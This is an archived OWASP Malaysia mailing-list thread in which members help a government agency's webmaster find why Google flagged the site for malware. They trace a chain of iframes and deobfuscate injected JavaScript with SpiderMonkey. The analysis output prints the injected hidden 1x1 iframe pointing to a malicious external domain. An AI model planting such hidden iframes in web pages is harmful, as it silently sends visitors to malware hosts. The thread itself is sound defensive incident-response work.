Posted here last year ;) https://lists.owasp.org/pipermail/owasp-malaysia/2010-September/000539.html
On Wed, Feb 9, 2011 at 10:37 AM, Adnan bin Mohd Shukor <[email protected]> wrote: > Hi, > > For further action :) > > http://25yearsofprogramming.com/blog/20070705.htm > > Thanks > > On 9 February 2011 10:36, Rasta Boy <[email protected]> wrote: >> Syamsuri, nice to hear that. Can you share your blog address. >> >> Adnan good work. Hope to learn more from you. >> >> On Wed, Feb 9, 2011 at 6:53 AM, Mohd Syamsuri <[email protected]> wrote: >>> >>> Mr Adnan thanks for the info and guide.. >>> >>> I have clean all the mess and the site is up and running again.. >>> >>> thanks to all too.. >>> >>> ** I will blog this so others can make it as a guide... >>> >>> On Tue, Feb 8, 2011 at 6:00 PM, Adnan bin Mohd Shukor >>> <[email protected]> wrote: >>>> >>>> mamp <= LOL typo.. it should be nano >>>> js <= one of hte binary in Spidermonkey. get the patched version >>>> http://blog.didierstevens.com/programs/spidermonkey/ and if you are >>>> working on MacOS/Darwin, apply this patch >>>> >>>> http://blog.xanda.org/2010/10/15/fix-for-spidermonkey-build-issue-in-darwin/ >>>> >>>> thanks >>>> >>>> On 8 February 2011 17:56, Sharuzzaman Ahmat Raslan >>>> <[email protected]> wrote: >>>> > I can see 2 interesting apps/scripts: >>>> > >>>> > 1. mamp >>>> > 2. /opt/analysis/js/js >>>> > >>>> > care to share? hopefully it is open source ;) >>>> > >>>> > >>>> > On Tue, Feb 8, 2011 at 5:50 PM, Adnan bin Mohd Shukor >>>> > <[email protected]> wrote: >>>> >> >>>> >> Here is my bash history: >>>> >> >>>> >> xanda:tmp adnan$ history >>>> >> <snip> >>>> >> 500 cd /tmp >>>> >> 501 wget http:/www2.pkink.gov.my/indexsedc.php >>>> >> 502 wget http://www2.pkink.gov.my/indexsedc.php >>>> >> 503 nano indexsedc.php >>>> >> 504 wget http://www2.pkink.gov.my/indexsedc.php >>>> >> 505 mamp indexsedc.php.1 >>>> >> 506 nano indexsedc.php.1 >>>> >> 507 wget http://www2.pkink.gov.my/sedc.php >>>> >> 508 nano sedc.php >>>> >> 509 wget http://www2.pkink.gov.my/default.php >>>> >> 510 nano default.php >>>> >> 511 nano default.php >>>> >> 512 clear >>>> >> <I've remove tags and leave clean JavaScript inside> >>>> >> 513 mv default.php default.txt >>>> >> 514 /opt/analysis/js/js < default.txt >>>> >> 515 cat write.log >>>> >> 516 history >>>> >> xanda:tmp adnan$ >>>> >> >>>> >> Below is the output of the cat: >>>> >> [output] >>>> >> xanda:tmp adnan$ cat write.log >>>> >> <iframe width="1" height="1" >>>> >> >>>> >> >>>> >> src="http://asfiuweof.co.cc/QQkFBg0AAQ0MBA0DEkcJBQYNAgAGBQUBDA==";></iframe>"<iframe >>>> >> width="1" height="1" >>>> >> >>>> >> >>>> >> src="http://asfiuweof.co.cc/QQkFBg0AAQ0MBA0DEkcJBQYNAgAGBQUBDA==";></iframe>" >>>> >> [/output] >>>> >> >>>> >> >>>> >> Hint: you might use modified version of spidermonkey to 'understand' >>>> >> the javascript >>>> >> >>>> >> Thanks >>>> >> >>>> >> On 8 February 2011 17:38, Mohd Syamsuri <[email protected]> wrote: >>>> >> > thanks for the info.. >>>> >> > i will check all the file. >>>> >> > >>>> >> > how you found it? >>>> >> > >>>> >> > On Tue, Feb 8, 2011 at 5:21 PM, Adnan bin Mohd Shukor >>>> >> > <[email protected]> wrote: >>>> >> >> >>>> >> >> Here is the flow: >>>> >> >> >>>> >> >> 1) your indexsedc.php has an iframe to sedc.php >>>> >> >> 2) and your sedc.php has an iframe to default.php >>>> >> >> 3) and in default.php (look at the last 2 lines), javascript will >>>> >> >> actually create an iframe to >>>> >> >> asfiuweof.co.cc/QQkFBg0AAQ0MBA0DEkcJBQYNAgAGBQUBDA== >>>> >> >> >>>> >> >> thanks :) >>>> >> >> >>>> >> >> On 8 February 2011 17:07, Mohd Syamsuri <[email protected]> >>>> >> >> wrote: >>>> >> >> > can you point... >>>> >> >> > my index.htm or indexsedc.php or other file? >>>> >> >> > >>>> >> >> > On Tue, Feb 8, 2011 at 4:19 PM, Adnan bin Mohd Shukor >>>> >> >> > <[email protected]> wrote: >>>> >> >> >> >>>> >> >> >> you have iframe pointed to >>>> >> >> >> asfiuweof.co.cc/QQkFBg0AAQ0MBA0DEkcJBQYNAgAGBQUBDA== >>>> >> >> >> >>>> >> >> >> which is not xss :) >>>> >> >> >> >>>> >> >> >> >From my personal point of view, its either caused by: >>>> >> >> >> 1) malware on pc which has been used for ftp/access to the >>>> >> >> >> server >>>> >> >> >> 2) compromised server >>>> >> >> >> >>>> >> >> >> you can send your access.log to [email protected] or >>>> >> >> >> [email protected] for further analysis :) >>>> >> >> >> >>>> >> >> >> thanks >>>> >> >> >> >>>> >> >> >> On 8 February 2011 16:00, Mohd Syamsuri <[email protected]> >>>> >> >> >> wrote: >>>> >> >> >> > I have check it. >>>> >> >> >> > On Tue, Feb 8, 2011 at 3:49 PM, Rasta Boy >>>> >> >> >> > <[email protected]> >>>> >> >> >> > wrote: >>>> >> >> >> >> >>>> >> >> >> >> Hi Mohd Symsuri, >>>> >> >> >> >> >>>> >> >> >> >> Why dont you check on the reason why its being blocked, it >>>> >> >> >> >> might >>>> >> >> >> >> help. >>>> >> >> >> >> >>>> >> >> >> >> >>>> >> >> >> >> >>>> >> >> >> >> >>>> >> >> >> >> >>>> >> >> >> >> >>>> >> >> >> >> http://safebrowsing.clients.google.com/safebrowsing/diagnostic?client=Firefox&hl=en-US&site=http://www.pkink.gov.my/ >>>> >> >> >> >> >>>> >> >> >> >> >>>> >> >> >> >> >>>> >> >> >> >> >>>> >> >> >> >> >>>> >> >> >> >> >>>> >> >> >> >> http://safebrowsing.clients.google.com/safebrowsing/diagnostic?client=Firefox&hl=en-US&site=AS:4788 >>>> >> >> >> >> >>>> >> >> >> >> Regards, >>>> >> >> >> >> Kishur >>>> >> >> >> >> >>>> >> >> >> >> >>>> >> >> >> >> >>>> >> >> >> >> On Tue, Feb 8, 2011 at 3:19 PM, Mohd Syamsuri >>>> >> >> >> >> <[email protected]> >>>> >> >> >> >> wrote: >>>> >> >> >> >>> >>>> >> >> >> >>> Assalamualikum and Good day for my fellow friends. >>>> >> >> >> >>> I need some advise. >>>> >> >> >> >>> Web site Perbadanan kemajuan Iktisad Negeri Kelantan >>>> >> >> >> >>> (http://www.pkink.gov.my) have been blocked by Google for >>>> >> >> >> >>> almost >>>> >> >> >> >>> 4 >>>> >> >> >> >>> days. >>>> >> >> >> >>> It said that we host malware on our server Malware Detected! >>>> >> >> >> >>> ( >>>> >> >> >> >>> Google >>>> >> >> >> >>> said that!!) >>>> >> >> >> >>> What i did is.. >>>> >> >> >> >>> 1. Scan all the data and upload a new data >>>> >> >> >> >>> 2. Check the index.html or index.php >>>> >> >> >> >>> 3. Scan using web scanner using >>>> >> >> >> >>> http://www.avgthreatlabs.com/ >>>> >> >> >> >>> http://www.virustotal.com >>>> >> >> >> >>> but still get block.. >>>> >> >> >> >>> Googel said Suspected injected code >>>> >> >> >> >>> <FRAME SRC="http://www2.pkink.gov.my/indexsedc.php"; >>>> >> >> >> >>> NAME="confcontent" >>>> >> >> >> >>> scrolling=yes > >>>> >> >> >> >>> I have using this code for almost 2 years >>>> >> >> >> >>> What should i do now? >>>> >> >> >> >>> >>>> >> >> >> >>> -- >>>> >> >> >> >>> best regard >>>> >> >> >> >>> syamsuri >>>> >> >> >> >>> >>>> >> >> >> >>> >>>> >> >> >> >>> >>>> >> >> >> >>> _______________________________________________ >>>> >> >> >> >>> Owasp-Malaysia mailing list >>>> >> >> >> >>> [email protected] >>>> >> >> >> >>> https://lists.owasp.org/mailman/listinfo/owasp-malaysia >>>> >> >> >> >>> >>>> >> >> >> >>> OWASP Malaysia Wiki >>>> >> >> >> >>> http://www.owasp.org/index.php/Malaysia >>>> >> >> >> >>> >>>> >> >> >> >>> OWASP Malaysia Wiki Facebook >>>> >> >> >> >>> >>>> >> >> >> >>> >>>> >> >> >> >>> >>>> >> >> >> >>> >>>> >> >> >> >>> http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420 >>>> >> >> >> >> >>>> >> >> >> >> >>>> >> >> >> >> _______________________________________________ >>>> >> >> >> >> Owasp-Malaysia mailing list >>>> >> >> >> >> [email protected] >>>> >> >> >> >> https://lists.owasp.org/mailman/listinfo/owasp-malaysia >>>> >> >> >> >> >>>> >> >> >> >> OWASP Malaysia Wiki >>>> >> >> >> >> http://www.owasp.org/index.php/Malaysia >>>> >> >> >> >> >>>> >> >> >> >> OWASP Malaysia Wiki Facebook >>>> >> >> >> >> >>>> >> >> >> >> >>>> >> >> >> >> >>>> >> >> >> >> http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420 >>>> >> >> >> > >>>> >> >> >> > >>>> >> >> >> > >>>> >> >> >> > -- >>>> >> >> >> > best regard >>>> >> >> >> > syamsuri >>>> >> >> >> > >>>> >> >> >> > >>>> >> >> >> > >>>> >> >> >> > _______________________________________________ >>>> >> >> >> > Owasp-Malaysia mailing list >>>> >> >> >> > [email protected] >>>> >> >> >> > https://lists.owasp.org/mailman/listinfo/owasp-malaysia >>>> >> >> >> > >>>> >> >> >> > OWASP Malaysia Wiki >>>> >> >> >> > http://www.owasp.org/index.php/Malaysia >>>> >> >> >> > >>>> >> >> >> > OWASP Malaysia Wiki Facebook >>>> >> >> >> > >>>> >> >> >> > >>>> >> >> >> > >>>> >> >> >> > http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420 >>>> >> >> >> > >>>> >> >> >> _______________________________________________ >>>> >> >> >> Owasp-Malaysia mailing list >>>> >> >> >> [email protected] >>>> >> >> >> https://lists.owasp.org/mailman/listinfo/owasp-malaysia >>>> >> >> >> >>>> >> >> >> OWASP Malaysia Wiki >>>> >> >> >> http://www.owasp.org/index.php/Malaysia >>>> >> >> >> >>>> >> >> >> OWASP Malaysia Wiki Facebook >>>> >> >> >> >>>> >> >> >> >>>> >> >> >> http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420 >>>> >> >> > >>>> >> >> > >>>> >> >> > >>>> >> >> > -- >>>> >> >> > best regard >>>> >> >> > syamsuri >>>> >> >> > >>>> >> >> > >>>> >> >> > >>>> >> >> > _______________________________________________ >>>> >> >> > Owasp-Malaysia mailing list >>>> >> >> > [email protected] >>>> >> >> > https://lists.owasp.org/mailman/listinfo/owasp-malaysia >>>> >> >> > >>>> >> >> > OWASP Malaysia Wiki >>>> >> >> > http://www.owasp.org/index.php/Malaysia >>>> >> >> > >>>> >> >> > OWASP Malaysia Wiki Facebook >>>> >> >> > >>>> >> >> > >>>> >> >> > http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420 >>>> >> >> > >>>> >> >> _______________________________________________ >>>> >> >> Owasp-Malaysia mailing list >>>> >> >> [email protected] >>>> >> >> https://lists.owasp.org/mailman/listinfo/owasp-malaysia >>>> >> >> >>>> >> >> OWASP Malaysia Wiki >>>> >> >> http://www.owasp.org/index.php/Malaysia >>>> >> >> >>>> >> >> OWASP Malaysia Wiki Facebook >>>> >> >> >>>> >> >> http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420 >>>> >> > >>>> >> > >>>> >> > >>>> >> > -- >>>> >> > best regard >>>> >> > syamsuri >>>> >> > >>>> >> > >>>> >> > >>>> >> > _______________________________________________ >>>> >> > Owasp-Malaysia mailing list >>>> >> > [email protected] >>>> >> > https://lists.owasp.org/mailman/listinfo/owasp-malaysia >>>> >> > >>>> >> > OWASP Malaysia Wiki >>>> >> > http://www.owasp.org/index.php/Malaysia >>>> >> > >>>> >> > OWASP Malaysia Wiki Facebook >>>> >> > >>>> >> > http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420 >>>> >> > >>>> >> _______________________________________________ >>>> >> Owasp-Malaysia mailing list >>>> >> [email protected] >>>> >> https://lists.owasp.org/mailman/listinfo/owasp-malaysia >>>> >> >>>> >> OWASP Malaysia Wiki >>>> >> http://www.owasp.org/index.php/Malaysia >>>> >> >>>> >> OWASP Malaysia Wiki Facebook >>>> >> >>>> >> http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420 >>>> > >>>> > >>>> > >>>> > -- >>>> > Sharuzzaman Ahmat Raslan >>>> > >>>> > _______________________________________________ >>>> > Owasp-Malaysia mailing list >>>> > [email protected] >>>> > https://lists.owasp.org/mailman/listinfo/owasp-malaysia >>>> > >>>> > OWASP Malaysia Wiki >>>> > http://www.owasp.org/index.php/Malaysia >>>> > >>>> > OWASP Malaysia Wiki Facebook >>>> > http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420 >>>> > >>>> _______________________________________________ >>>> Owasp-Malaysia mailing list >>>> [email protected] >>>> https://lists.owasp.org/mailman/listinfo/owasp-malaysia >>>> >>>> OWASP Malaysia Wiki >>>> http://www.owasp.org/index.php/Malaysia >>>> >>>> OWASP Malaysia Wiki Facebook >>>> http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420 >>> >>> >>> >>> -- >>> best regard >>> syamsuri >>> >>> >>> >>> _______________________________________________ >>> Owasp-Malaysia mailing list >>> [email protected] >>> https://lists.owasp.org/mailman/listinfo/owasp-malaysia >>> >>> OWASP Malaysia Wiki >>> http://www.owasp.org/index.php/Malaysia >>> >>> OWASP Malaysia Wiki Facebook >>> http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420 >> >> >> _______________________________________________ >> Owasp-Malaysia mailing list >> [email protected] >> https://lists.owasp.org/mailman/listinfo/owasp-malaysia >> >> OWASP Malaysia Wiki >> http://www.owasp.org/index.php/Malaysia >> >> OWASP Malaysia Wiki Facebook >> http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420 >> > _______________________________________________ > Owasp-Malaysia mailing list > [email protected] > https://lists.owasp.org/mailman/listinfo/owasp-malaysia > > OWASP Malaysia Wiki > http://www.owasp.org/index.php/Malaysia > > OWASP Malaysia Wiki Facebook > http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420 > _______________________________________________ Owasp-Malaysia mailing list [email protected] https://lists.owasp.org/mailman/listinfo/owasp-malaysia OWASP Malaysia Wiki http://www.owasp.org/index.php/Malaysia OWASP Malaysia Wiki Facebook http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420
